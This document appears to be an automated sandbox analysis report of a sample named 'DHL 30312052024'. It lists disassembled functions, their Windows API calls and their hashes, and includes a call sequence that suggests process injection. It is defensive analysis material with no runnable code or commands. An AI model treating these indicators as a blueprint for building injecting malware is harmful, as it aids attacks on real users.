                                                                                        Function 00C07A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        • Opcode ID: dcaa55ca9a04723143b9e8694f613c9e7f590ea8bac40c6ab2e3bad66fc376f5
                                                                                        • Instruction ID: 7b912ed2c50e75f03d093f64581ed8bbca9a9763229692349c0526e69f19143d
                                                                                        • Opcode Fuzzy Hash: dcaa55ca9a04723143b9e8694f613c9e7f590ea8bac40c6ab2e3bad66fc376f5
                                                                                        • Instruction Fuzzy Hash: FA31C7B1B04506AFC708DF68D8D1E69B3A5FF48310B158729E529CB6D1EB30FA50DB90
                                                                                        Function 00C047D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsThemeActive.UXTHEME ref: 00C04834
                                                                                          • Part of subcall function 00C2336C: __lock.LIBCMT ref: 00C23372
                                                                                          • Part of subcall function 00C2336C: DecodePointer.KERNEL32(00000001,?,00C04849,00C57C74), ref: 00C2337E
                                                                                          • Part of subcall function 00C2336C: EncodePointer.KERNEL32(?,?,00C04849,00C57C74), ref: 00C23389
                                                                                          • Part of subcall function 00C048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C04915
                                                                                          • Part of subcall function 00C048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C0492A
                                                                                          • Part of subcall function 00C03B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C03B68
                                                                                          • Part of subcall function 00C03B3A: IsDebuggerPresent.KERNEL32 ref: 00C03B7A
                                                                                          • Part of subcall function 00C03B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00CC52F8,00CC52E0,?,?), ref: 00C03BEB
                                                                                          • Part of subcall function 00C03B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00C03C6F
                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C04874
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                        • String ID:
                                                                                        • API String ID: 1438897964-0
                                                                                        • Opcode ID: a38c90d15a753d164f18d92f4359197d9140fcdf77c5139c57aef91776696685
                                                                                        • Instruction ID: 0ca0b1e085d2d1b8be0ea00bff199403ec5527cd27133c01c7822167649f4f4a
                                                                                        • Opcode Fuzzy Hash: a38c90d15a753d164f18d92f4359197d9140fcdf77c5139c57aef91776696685
                                                                                        • Instruction Fuzzy Hash: 35119DB19083519FC704DF29E805B0EBBE8EF94750F108A1EF440872F1DB709A89CB96
                                                                                        Function 00C20DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C2571C: __FF_MSGBANNER.LIBCMT ref: 00C25733
                                                                                          • Part of subcall function 00C2571C: __NMSG_WRITE.LIBCMT ref: 00C2573A
                                                                                          • Part of subcall function 00C2571C: RtlAllocateHeap.NTDLL(013A0000,00000000,00000001,00000000,?,?,?,00C20DD3,?), ref: 00C2575F
                                                                                        • std::exception::exception.LIBCMT ref: 00C20DEC
                                                                                        • __CxxThrowException@8.LIBCMT ref: 00C20E01
                                                                                          • Part of subcall function 00C2859B: RaiseException.KERNEL32(?,?,?,00CB9E78,00000000,?,?,?,?,00C20E06,?,00CB9E78,?,00000001), ref: 00C285F0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 3902256705-0
                                                                                        • Opcode ID: 1e33197620802e0e0c6eb2c31bae2e1ddea7a5090bb92936d37ad716eae13c4b
                                                                                        • Instruction ID: 8a6185c7bc9875860a70a0ff983fbad43ff43061cfc6a9cff496c94349e61b37
                                                                                        • Opcode Fuzzy Hash: 1e33197620802e0e0c6eb2c31bae2e1ddea7a5090bb92936d37ad716eae13c4b
                                                                                        • Instruction Fuzzy Hash: F2F0A47650233976DF10FAA8FC159DFB7AC9F01311F204426F95496992DF709B84E2D1
                                                                                        Function 00C253A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C28B28: __getptd_noexit.LIBCMT ref: 00C28B28
                                                                                        • __lock_file.LIBCMT ref: 00C253EB
                                                                                          • Part of subcall function 00C26C11: __lock.LIBCMT ref: 00C26C34
                                                                                        • __fclose_nolock.LIBCMT ref: 00C253F6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2800547568-0
                                                                                        • Opcode ID: 4de4837a59d454991655f82d9caf5d63b95209cf1d4c5aa017e54293e38b9272
                                                                                        • Instruction ID: 4b5005f46f4135a31d95b413264bedeeb5ec07582204549ea9d057daebf6c7f5
                                                                                        • Opcode Fuzzy Hash: 4de4837a59d454991655f82d9caf5d63b95209cf1d4c5aa017e54293e38b9272
                                                                                        • Instruction Fuzzy Hash: 96F0BB35902A249ADB10FF75B8017AF77E06F41374F209148E464AB9D1CFFC49457B51
                                                                                        Function 013EB0DD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 013EB89B
                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 013EB931
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 013EB953
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1397551629.00000000013E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 013E9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_13e9000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 2438371351-0
                                                                                        • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                                        • Instruction ID: c814b8a8b9cf1c35f76e8f365b709c35c8c33eebb1ff524bd885e6108f88237c
                                                                                        • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                                        • Instruction Fuzzy Hash: EF12DE24E18658C6EB24DF64D8547DEB272EF68300F1090E9D10DEB7A4E77A4F81CB5A
                                                                                        Function 00C20C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                        • Instruction ID: 40be426aa71f4153e06edb39912072d535c9c64ea9bf3413d25c2de7f827458b
                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                        • Instruction Fuzzy Hash: EC31F7B0A001159FC718DF09E484969FBA6FB49300B3487A6E81ACBB52D731EEC1DBC1
                                                                                        Function 00C3FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        • Opcode ID: e3c1e3544595939795b41efdc36a6d21c8ea64bc43a92859454d95fbf5fe996a
                                                                                        • Instruction ID: 1990291ea8d25e3b5fabbe9217d8941a496f9a08de412bf328caa916b941a457
                                                                                        • Opcode Fuzzy Hash: e3c1e3544595939795b41efdc36a6d21c8ea64bc43a92859454d95fbf5fe996a
                                                                                        • Instruction Fuzzy Hash: AF4107745083519FDB14DF14C448B1ABBE0BF45318F1988ACE8998B7A2C732ED45CF52
                                                                                        Function 00C04DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C04BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00C04BEF
                                                                                          • Part of subcall function 00C2525B: __wfsopen.LIBCMT ref: 00C25266
                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00CC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C04E0F
                                                                                          • Part of subcall function 00C04B6A: FreeLibrary.KERNEL32(00000000), ref: 00C04BA4
                                                                                          • Part of subcall function 00C04C70: _memmove.LIBCMT ref: 00C04CBA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Free$Load__wfsopen_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 1396898556-0
                                                                                        • Opcode ID: 48b87919e5072b809b50573897f35432eedca439ce41812a23c25be7cabb5fa4
                                                                                        • Instruction ID: b6f6f3478abc6ee75adeea43f43167fb29a438e9d8b8f10a2d51d6cfe6525ce5
                                                                                        • Opcode Fuzzy Hash: 48b87919e5072b809b50573897f35432eedca439ce41812a23c25be7cabb5fa4
                                                                                        • Instruction Fuzzy Hash: 9F11A771640205ABCF19BF70D816F6FB7A9AF84710F10842DF652A71C1DA759A01EB91
                                                                                        Function 00C3FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        • Opcode ID: 7b383225ae80d2c39dfcbc52b09baa0089d80b094d243a951a582bee64eaa005
                                                                                        • Instruction ID: d9d2b9698585856c25575497b6c255e2c65ada07950534f23a250f675c706b60
                                                                                        • Opcode Fuzzy Hash: 7b383225ae80d2c39dfcbc52b09baa0089d80b094d243a951a582bee64eaa005
                                                                                        • Instruction Fuzzy Hash: 1B2164B4908301DFDB14DF24C844B1ABBE0BF88314F15886CF89A977A2C731E849DB92
                                                                                        Function 00C07DE1 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        • Opcode ID: 8552a27d75c028384bb5dded52737eaba16b17fc97a4acef3cde4278dbd9ffc2
                                                                                        • Instruction ID: 6eae83463486564e05c856cd1365bbf401dfca9a060d5e2c8dca335743ab85af
                                                                                        • Opcode Fuzzy Hash: 8552a27d75c028384bb5dded52737eaba16b17fc97a4acef3cde4278dbd9ffc2
                                                                                        • Instruction Fuzzy Hash: 440149B26053016EC3249F39DC06FA7BB94DB04360F10862EF62ACA5D1EA31F940D790
                                                                                        Function 00C24863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __lock_file.LIBCMT ref: 00C248A6
                                                                                          • Part of subcall function 00C28B28: __getptd_noexit.LIBCMT ref: 00C28B28
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __getptd_noexit__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2597487223-0
                                                                                        • Opcode ID: 7b3da71ce0619002326f074b15d0ca0a9091b7e451ce781638602c06a9302e63
                                                                                        • Instruction ID: 06a84ccc608707440ed0a523965287b48ff2c59e6c03c9c5da773354ff11fb98
                                                                                        • Opcode Fuzzy Hash: 7b3da71ce0619002326f074b15d0ca0a9091b7e451ce781638602c06a9302e63
                                                                                        • Instruction Fuzzy Hash: 2DF02231811229EBDF15FFB4AC063EE37A0AF01321F008414F420DAAC1DBB88A50EB51
                                                                                        Function 00C20739 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C207B0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongNamePath
                                                                                        • String ID:
                                                                                        • API String ID: 82841172-0
                                                                                        • Opcode ID: cc92939d9ad6baa940f55c3f7fc9e7241179a6f2a3c3f83fbfee1b416d759f60
                                                                                        • Instruction ID: a55b2b0a5eca5ea3674db5ab270772d1c801663eb9a2ee946b2313c4f73b1e0e
                                                                                        • Opcode Fuzzy Hash: cc92939d9ad6baa940f55c3f7fc9e7241179a6f2a3c3f83fbfee1b416d759f60
                                                                                        • Instruction Fuzzy Hash: B3F0E2368000389BCB11CB54E841AEAB368FF85770F2401A6FC04D7920EA308E5AC791
                                                                                        Function 00C04E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(?,?,00CC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C04E7E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID:
                                                                                        • API String ID: 3664257935-0
                                                                                        • Opcode ID: 6f469abbc60852dc6996b2455b476888c0e2fd8b5ddb4f571fc2304d9ac30bbe
                                                                                        • Instruction ID: d9a43e1d6742399c9e121623fd63f4a3a3250fb9fbbc147b0951120ece699769
                                                                                        • Opcode Fuzzy Hash: 6f469abbc60852dc6996b2455b476888c0e2fd8b5ddb4f571fc2304d9ac30bbe
                                                                                        • Instruction Fuzzy Hash: 5DF039B1501711CFCB389F65E494817FBE5BF143693208A3EE2F682660C732A940DF40
                                                                                        Function 00C20791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C207B0
                                                                                          • Part of subcall function 00C07BCC: _memmove.LIBCMT ref: 00C07C06
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongNamePath_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 2514874351-0
                                                                                        • Opcode ID: bb962db1f76c4c85b344bf2d4b6240316efb9878be5595b3290092714b168313
                                                                                        • Instruction ID: e9ac6792ec0325d033325fdb3abed4fd91e9cb27c431afa77d05c351d71bb245
                                                                                        • Opcode Fuzzy Hash: bb962db1f76c4c85b344bf2d4b6240316efb9878be5595b3290092714b168313
                                                                                        • Instruction Fuzzy Hash: 7FE0CD369042285BC720D6599C05FEA77DDDFC87A0F0541B5FC0CD7244DD60AC8086D0
                                                                                        Function 00C2525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wfsopen
                                                                                        • String ID:
                                                                                        • API String ID: 197181222-0
                                                                                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                        • Instruction ID: a04d1ba9693d203cb7bb6ad8338777d16af340eacbeaf105c69fc0bda244a6a5
                                                                                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                        • Instruction Fuzzy Hash: 42B0927644020CBBCE012A82FC02A5A3B199B41764F408020FB0C185A2A673A664AA89
                                                                                        Function 013EC0E0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(000001F4), ref: 013EC0F1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1397551629.00000000013E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 013E9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_13e9000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID:
                                                                                        • API String ID: 3472027048-0
                                                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                        • Instruction ID: 433c0f287c6115abaf551c1ef41448fdb323bb228e482ee0a62cdc171cbc037b
                                                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                        • Instruction Fuzzy Hash: 4DE0E67494020DDFDB00EFB4D54D69E7FF4EF04301F100161FD01D2281D6309D508A62

                                                                                        Non-executed Functions

                                                                                        Function 00C8CABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C02612: GetWindowLongW.USER32(?,000000EB), ref: 00C02623
                                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00C8CB37
                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C8CB95
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00C8CBD6
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C8CC00
                                                                                        • SendMessageW.USER32 ref: 00C8CC29
                                                                                        • _wcsncpy.LIBCMT ref: 00C8CC95
                                                                                        • GetKeyState.USER32(00000011), ref: 00C8CCB6
                                                                                        • GetKeyState.USER32(00000009), ref: 00C8CCC3
